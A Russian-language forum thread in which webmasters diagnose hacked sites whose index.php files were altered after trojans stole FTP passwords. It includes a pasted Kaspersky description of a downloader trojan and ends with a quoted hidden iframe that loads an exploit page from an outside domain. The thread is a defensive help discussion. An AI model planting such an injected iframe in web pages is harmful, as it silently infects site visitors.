Снова о вирусах

Каспер при установке затребует удалить Нода

zzzzz

Запрсои у хостера логи доступа по http и по ftp , ищи записи вблизи даты модификации файла с чужими ссылками.

Это просто небольшой троян который сканирует компьютер жертвы в поисках паролей к ftp аське и т.д. касперский его легко ловит. Проблема лечиться полным сканирование компьютера и изменением всех паролей.

Да и винды сносить не надо.

Kpd Вот обнаружил в Управлении ФТП сессиями каких то непонятных пользователей, получается эти пользователи могут закачать что угодно или я чего то не понял.

Вы случайно ни это имеете ввиду.

Было такое же... в итоге пойман и уничтожен троян. Смена паролей для ftp помогла. FTP пароли не рекомендую хранить в Total Commander или чем то подобном...

Связка - firewall + антивирус (с обновлениями) обычно решают такие проблемы.

Антивирус может и не помочь. Не далее как вчера зашел вечерком на rbc.ru - Касперский заверещал - страница инфицирована Trojan-Downloader.JS.Psyme.gy

Но через пару секунд фаервол показал исходящее соединение с файла C:\syszigq.exe - ясень пень, события связаны. Вчера в нем ничего не нашел , а вот сейчас орет "обнаружено: троянская программа Trojan-Downloader.Win32.Small.est".

Кстати, КИС 7 (уже не бета), поставил как раз после заражения нескольких своих файлов троянами, до этого был КАВ 5 и виндовый фаервол (теперь знаю, глупо 🙄 надеялся, что аппаратный спасает в модеме).

Думаю, как раз таким макаром мои ФТП пароли от CuteFTP и уплыли.

З.Ы., да, а в РБК я уже 2 раза писал по аналогичному поводу, они всякую рекламу крутят, вот и попадается зараза.

Борьба продолжается, вобщем чистил камп NOD32, потом Spybot, сегодня удалил nod32, установил касперыча, вобщем какашек много все вирусоловы нашли, поменял пароли ftp, но проблема помоему осталась. Когда захожу на свои сайты, с уже перезалитыми файлами index.php, в которых и появлялась проблема, касперыч орёт, как потерпевший и выдаёт (смотрите скрин),на что в «Лаборатории Касперского» говорят:

------------------------

Технические детали

Троянская программа-загрузчик, предназначенная для запуска на зараженной машине других троянцев. Использует уязвимость в Microsoft Internet Explorer. Реализована в виде HTML-страницы, при загрузке которой запускается на исполнение вредоносный код, написанный на языке Visual Basic Script.

Деструктивная активность

Троянец загружает из сети Интернет другой исполняемый файл, сохраняет его в корневой каталог Windows («%WinDir%») под случайно сгенерированным именем и запускает на исполнение. Также скачанный файл сохраняется во временный каталог Windows («%Temp%») под именем «update.exe» или «file.exe».

На момент создания описания вирус скачивал один из двух вредоносных объектов, детектирующихся Антивирусом Касперского как Trojan-PSW.Win32.LdPinch.btv и Trojan.Win32.Agent.oh.

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для ее удаления необходимо выполнить следующие действия:

Удалить оригинальный файл троянца (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).

Удалить файлы:

%Temp%\update.exe

%Temp%\file.exe

--------------------------------------------

Ну я так и не понял что и где нужно удалить, кто нибудь может что то посоветовать.

Указанный сайт - ваш? Вы код страницы смотрели?

В том то и дело, что сайт не мой, вот один из моих проблемных сайтов, где выскакивает это сообщение stroyexpo.info , если не побоитесь на него заходить.

Смотрим код страницы и видим

<iframe src='http://pynet.ws/exp/index.php' width='1' height='1' style='visibility: hidden;'></iframe>